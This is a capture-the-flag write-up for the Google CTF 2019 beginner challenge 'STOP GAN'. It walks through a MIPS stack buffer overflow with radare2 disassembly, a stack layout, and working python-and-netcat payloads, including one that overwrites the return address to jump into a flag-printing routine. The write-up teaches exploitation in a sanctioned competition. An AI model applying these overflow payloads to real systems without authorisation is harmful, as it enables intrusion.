Tags: beginner pwn 


(includes solution for second flag)

STOP GAN (**pwn**)

Success, you've gotten the picture of your lost love, not knowing
that pictures and the things you take pictures of are generally two
seperate things, you think you've rescue them and their brethren by
downloading them all to your ships hard drive. They're still being
eaten, but this is a fact that has escaped you entirely. Your
thoughts swiftly shift to revenge. It's important now to stop this
program from destroying these "Cauliflowers" as they're referred
to, ever again.

Zip-file contains some executable `bof` and some C source code
`console.c`. From source code we can read that our first goal is to
simply overflow buffer of `bof` binary, which is run by `console`
program. Also, from `console.c` it looks like `bof` is MIPS binary,
check it:

$ file ./bof
./bof: ELF 32-bit LSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=a31c48679f10dc6945e7b5e3a88b979bebe752e3, not stripped

Typically on x86/amd64 system you need `qemu-mipsel` to run such
executables, and `console.c` tries to do it. But it is not necessary
to compile `console.c`, because qemu can be invoked manually:

$ qemu-mipsel ./bof
Cauliflower systems never crash >>

Okay, it must be very easy just to overflow the buffer. Say, 1 kb
should be enough in most cases:

$ python -c "print('A'*1024)" | qemu-mipsel ./bof
Cauliflower systems never crash >>
qemu-mipsel: /build/qemu-DqynNa/qemu-2.8+dfsg/translate-all.c:175: tb_lock: Assertion `!have_tb_lock' failed.
qemu-mipsel: /build/qemu-DqynNa/qemu-2.8+dfsg/translate-all.c:175: tb_lock: Assertion `!have_tb_lock' failed.
Segmentation fault

And now we should send it to the given address (do not forget prepend
trash with 'run' command for `console` wrapper):

$ python -c "print('run\n'+'A'*1024)" | nc buffer-overflow.ctfcompetition.com 1337
Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.
Bonus flag for controlling the crash.

Console commands:
>>Inputs: run
Cauliflower systems never crash >>
segfault detected! ***CRASH***
Console commands:

Here is first flag:


Now to the second flag. Use radare2 for it. As MIPS instruction
set can looks unfamiliar, one can turn on disasm descriptions to ease
understanding of what is going on. Essentially, the buffer overflow
exploitation must not differ significantly from those of x86
architecture. Because with MIPS we have almost exactly the same:

- *stack* that is contigous block of memory;
- *frame pointer* and *stack pointer* - two addresses within
*stack* that specify *stack frame* used for function arguments and
local variables (they are `fp` and `sp` in radare2);
- *return address* that is pushed to the *stack* on function call and
poped from stack when returning from it (it is `ra` in radare2).

Some disassembling:

$ r2 ./bof
-- The Hard ROP Cafe
[0x00400530]> aa
[x] Analyze all flags starting with sym. and entry0 (aa)
[0x00400530]> e asm.describe =true
[0x00400530]> afl~main
0x00474504 15 384 sym._nl_unload_domain
0x004032b0 418 6248 -> 5732 sym._nl_load_domain
0x004466c0 1 60 sym._IO_switch_to_main_wget_area
0x00402f80 39 816 sym._nl_find_domain
0x00400908 6 256 main
0x00474480 6 132 sym._nl_finddomain_subfreeres
0x00400a10 35 784 sym.__libc_start_main
0x0040f53c 1 56 sym._IO_switch_to_main_get_area
[0x00400530]> pdf@main
/ (fcn) main 256
| int main (int argc, char **argv, char **envp);
| ; arg int32_t arg_10h @ fp+0x10
| ; arg int32_t arg_18h @ fp+0x18
| ; var int32_t var_10h @ sp+0x10
| ; var int32_t var_120h @ sp+0x120
| ; var int32_t var_124h @ sp+0x124
| ; arg int argc @ a0
| ; arg char **argv @ a1
| 0x00400908 0b001c3c lui gp, 0xb ; loads a 16-bit immediate operand into the upper 16-bits of the register specified.
| 0x0040090c 68809c27 addiu gp, gp, -0x7f98 ; add sign-extended constants (or copy one register to another: addi $1, $2, 0)
| 0x00400910 21e09903 addu gp, gp, t9 ; adds two registers
| 0x00400914 d8febd27 addiu sp, sp, -0x128 ; add sign-extended constants (or copy one register to another: addi $1, $2, 0)
| 0x00400918 2401bfaf sw ra, (var_124h) ; sw $t,C($s), stores a word into: MEM[$s+C] and the following 3 bytes.
| 0x0040091c 2001beaf sw fp, (var_120h) ; sw $t,C($s), stores a word into: MEM[$s+C] and the following 3 bytes.
| 0x00400920 25f0a003 move fp, sp ; moves a register value into another register (pseudoinstruction).
| | 0x004009a0 1000dc8f lw gp, (arg_10h) ; lw $t,C($s), loads the word stored from: MEM[$s+C] and the following 3 bytes.
| | 0x004009a4 1c00c227 addiu v0, fp, 0x1c ; add sign-extended constants (or copy one register to another: addi $1, $2, 0)
| | 0x004009a8 25284000 move a1, v0 ; moves a register value into another register (pseudoinstruction).
| | 0x004009ac 3480828f lw v0, -0x7fcc(gp) ; [0x4a09a4:4]=0x470000 ; lw $t,C($s), loads the word stored from: MEM[$s+C] and the following 3 bytes.
| | 0x004009b0 f4544424 addiu a0, v0, 0x54f4 ; add sign-extended constants (or copy one register to another: addi $1, $2, 0); argc
| | 0x004009b4 3881828f lw v0, -sym.__isoc99_scanf(gp) ; [0x4a0aa8:4]=0x408740 sym.__isoc99_scanf ; lw $t,C($s), loads the word stored from: MEM[$s+C] and the following 3 bytes.
| | 0x004009b8 25c84000 move t9, v0 ; moves a register value into another register (pseudoinstruction).
| | 0x004009bc 601f1104 bal sym.__isoc99_scanf ; branch and link ; int scanf(const char *format)
| | 0x004009c0 00000000 nop ; no operation
| | 0x004009c4 1000dc8f lw gp, (arg_10h) ; lw $t,C($s), loads the word stored from: MEM[$s+C] and the following 3 bytes.
| | 0x004009c8 1800c28f lw v0, (arg_18h) ; lw $t,C($s), loads the word stored from: MEM[$s+C] and the following 3 bytes.
| |,=< 0x004009cc 07004014 bnez v0, 0x4009ec
| || 0x004009d0 00000000 nop ; no operation
| || 0x004009d4 3080828f lw v0, -loc.__ehdr_start(gp) ; [0x4a09a0:4]=0x400000 loc.__ehdr_start ; lw $t,C($s), loads the word stored from: MEM[$s+C] and the following 3 bytes.
| || 0x004009d8 40084224 addiu v0, v0, 0x840 ; add sign-extended constants (or copy one register to another: addi $1, $2, 0)
| || 0x004009dc 25c84000 move t9, v0 ; moves a register value into another register (pseudoinstruction).
| || 0x004009e0 97ff1104 bal sym.local_flag ; branch and link
| || 0x004009e4 00000000 nop ; no operation
| || 0x004009e8 1000dc8f lw gp, (arg_10h) ; lw $t,C($s), loads the word stored from: MEM[$s+C] and the following 3 bytes.
| |`-> 0x004009ec 25100000 move v0, zero ; moves a register value into another register (pseudoinstruction).
| | ; CODE XREF from main (0x400978)
| `--> 0x004009f0 25e8c003 move sp, fp ; moves a register value into another register (pseudoinstruction).
| 0x004009f4 2401bf8f lw ra, (var_124h) ; lw $t,C($s), loads the word stored from: MEM[$s+C] and the following 3 bytes.
| 0x004009f8 2001be8f lw fp, (var_120h) ; lw $t,C($s), loads the word stored from: MEM[$s+C] and the following 3 bytes.
| 0x004009fc 2801bd27 addiu sp, sp, 0x128 ; add sign-extended constants (or copy one register to another: addi $1, $2, 0)
| 0x00400a00 0800e003 jr ra ; jumps to the address contained in the specified register
\ 0x00400a04 00000000 nop ; no operation

Important things to note:

- `main` function uses 0x128 = 296 bytes of stack in total, from which:
- 4 bytes are used for return address `ra` (in the end it is loaded
from stack and program just jumps to this address - see
`lw ra, (var_124h)` and `jr ra`)
- 4 bytes are used for stack frame pointer `fp` (which also will be
restored before returning from `main`)
- the rest 0x120 = 288 bytes of stack are local variables
- `scanf()` reads data to `fp+0x1c` which is the same as `sp+0x1c`
because of `mov fp, sp` after function's prologue, i.e. we can
safely pass up to 0x120 - 0x1c = 0x104 = 260 characters before
starting to overwrite at first `fp` value and then `ra` value
- there is very interesting subroutine `sym.local_flag`

Stack layout can be represented as following (I prefer left-to-right
layout instead of top-to-bottom because it is more natural for me and
can give clearer view on what is going on when we write to the buffer
and beyond it's boundaries):

sp[0] sp[28] sp[288] sp[292] sp[296]
buf[-28] buf[0] buf[260] buf[264] buf[268]
| char dummy[28] | char buf[260] | fp | ra | <caller's locals> | ...

Do check our suggestions (remember that `scanf()` also writes
NULL-termination character to the end of the buffer, so actual number
of written bytes are one plus size of input):

$ python -c "print('A'*261)" | qemu-mipsel ./bof
Cauliflower systems never crash >>
$ python -c "print('A'*263)" | qemu-mipsel ./bof
Cauliflower systems never crash >>
$ python -c "print('A'*264)" | qemu-mipsel ./bof
Cauliflower systems never crash >>
Cauliflower systems never crash >>
$ python -c "print('A'*265)" | qemu-mipsel ./bof
Cauliflower systems never crash >>
qemu: uncaught target signal 4 (Illegal instruction) - core dumped
Illegal instruction

Wow, it seems like writing to `fp` does not cause any problems. I think
it is because caller of `main()` does not use this value (his stack
But look, writing to `ra` leads to some weird results. It is because
program jumps to some strange address of memory which contains byte
trash and not the working code.

Now let's think what jumping address can be of our interest. It is very
desirable to jump to `0x004009d4`, for example, so execution flow
enters function `sym.local_flag`, which is obviously our goal.
The problem is, this address contains byte `0x09` which in fact is
`'\t'` whitespace character and `scanf()` will replace it with `'\0'`
and stop reading. We need address that do not contain any whitespace
character, and not contain '\0' (except at the end, or in the high
bytes). Let's look into `sym.local_flag` itself:

[0x00400530]> [email protected]_flag
/ (fcn) sym.local_flag 84
| sym.local_flag (int32_t arg1, int32_t arg_10h);
| ; arg int32_t arg_10h @ fp+0x10
| ; var int32_t var_10h @ sp+0x10
| ; var int32_t var_18h @ sp+0x18
| ; var int32_t var_1ch @ sp+0x1c
| ; arg int32_t arg1 @ a0
| ; CALL XREF from main (0x4009e0)
| 0x00400840 0b001c3c lui gp, 0xb ; loads a 16-bit immediate operand into the upper 16-bits of the register specified.
| 0x00400844 30819c27 addiu gp, gp, -0x7ed0 ; add sign-extended constants (or copy one register to another: addi $1, $2, 0)
| 0x00400848 21e09903 addu gp, gp, t9 ; adds two registers
| 0x0040084c e0ffbd27 addiu sp, sp, -0x20 ; add sign-extended constants (or copy one register to another: addi $1, $2, 0)
| 0x00400850 1c00bfaf sw ra, (var_1ch) ; sw $t,C($s), stores a word into: MEM[$s+C] and the following 3 bytes.
| 0x00400854 1800beaf sw fp, (var_18h) ; sw $t,C($s), stores a word into: MEM[$s+C] and the following 3 bytes.
| 0x00400858 25f0a003 move fp, sp ; moves a register value into another register (pseudoinstruction).
| 0x0040085c 1000bcaf sw gp, (var_10h) ; sw $t,C($s), stores a word into: MEM[$s+C] and the following 3 bytes.
| 0x00400860 3480828f lw v0, -0x7fcc(gp) ; [0x4a09a4:4]=0x470000 ; lw $t,C($s), loads the word stored from: MEM[$s+C] and the following 3 bytes.
| 0x00400864 74544424 addiu a0, v0, 0x5474 ; 'tT' ; add sign-extended constants (or copy one register to another: addi $1, $2, 0); arg1
| 0x00400868 3080828f lw v0, -loc.__ehdr_start(gp) ; [0x4a09a0:4]=0x400000 loc.__ehdr_start ; lw $t,C($s), loads the word stored from: MEM[$s+C] and the following 3 bytes.
| 0x0040086c 30074224 addiu v0, v0, 0x730 ; add sign-extended constants (or copy one register to another: addi $1, $2, 0)
| 0x00400870 25c84000 move t9, v0 ; moves a register value into another register (pseudoinstruction).
| 0x00400874 aeff1104 bal sym.print_file ; branch and link
| 0x00400878 00000000 nop ; no operation
| 0x0040087c 1000dc8f lw gp, (arg_10h) ; lw $t,C($s), loads the word stored from: MEM[$s+C] and the following 3 bytes.
| 0x00400880 25200000 move a0, zero ; moves a register value into another register (pseudoinstruction).
| 0x00400884 2081828f lw v0, -sym.exit(gp) ; [0x4a0a90:4]=0x407b28 sym.exit ; lw $t,C($s), loads the word stored from: MEM[$s+C] and the following 3 bytes.
| 0x00400888 25c84000 move t9, v0 ; moves a register value into another register (pseudoinstruction).
| 0x0040088c a61c1104 bal sym.exit ; branch and link ; void exit(int status)
\ 0x00400890 00000000 nop ; no operation

Let's take address `0x00400858`, I like it because it restores `fp`
with some useful value and we must not think a lot about what to
write to it.
All pieces together: 260 bytes of trash, 4 bytes of more trash
(because `fp` will be overwritten very soon) and 4 bytes of return
address to `0x00400858` (remember byte ordering, it is 58:08:40:00 in
order), high byte of which we may not send, `scanf()` will write it
for us as NULL-terminator.
Try it:

$ python -c "print('A'*260 + 'A'*4 + '\x58\x08\x40')" | qemu-mipsel ./bof
Cauliflower systems never crash >>
could not open flag

Notice that there is no segmentation fault, the program thinks that
everything is Ok. And there is message that it tries but could not open
a flag. This tells us that we are on the right way. Check it with
remote server:

$ python -c "print('run\n' + 'A'*260 + 'A'*4 + '\x58\x08\x40')" | nc buffer-overflow.ctfcompetition.com 1337
Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.
Bonus flag for controlling the crash.

Console commands:
>>Inputs: run
Cauliflower systems never crash >>

Console commands:

The second one:


Original writeup (https://github.com/konelav/writeups/blob/master/GoogleCTF2019-BQ/Day4.STOP.GAN.md).